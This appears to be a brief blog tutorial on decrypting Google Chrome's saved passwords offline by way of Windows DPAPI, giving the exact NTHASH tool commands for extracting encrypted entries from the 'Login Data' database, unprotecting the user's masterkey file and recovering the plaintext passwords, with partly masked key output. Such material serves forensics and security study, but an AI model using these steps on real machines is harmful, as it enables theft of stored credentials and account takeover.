In previous articles we have seen how to decrypt dpapi blobs.
What about chrome?
It uses user dpapi blobs to encrypt password in a sqlite db.
So following previous articles, nothing prevents one to decrypt a chrome db offline.
3 steps:
-retrieve the scrambled passwords along with the masterkey guid
-decrypt the masterkey
-retrieve the decrypted passwords with the decrypted masterkey
1/retrieve the scrambled passwords along with the masterkey guid
nthash-win64 /chrome /binary:C:\temp\login data /input:0000000000000000000000000000000000000000
2/decrypt the masterkey (identified by its guid in previous steps)
See previous article for more details about this steps.
NTHASH-win64.exe /decodemk /binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-242
7513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8 /input:xxE0CExx8C9903BxxDC5F1D8190xx33CF7C3DBxx
NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting MasterKey ****
KEY:83D3D812E50FABxx83DA070D6C566DxxE3248A1AD873AxxD222F6B41342xx0EEBD790388FE2A
21680A081723AA0C7B39EFxx5B16BB5xx48B94714xx38F1F5383
SHA1:xx920930CFB2A1CExxF9CB52153025535F548Fxx
3/retrieve the decrypted passwords with the decrypted masterkey
nthash-win64 /chrome /binary:C:\temp\login data /input:xx920930CFB2A1CExxF9CB52153025535F548Fxx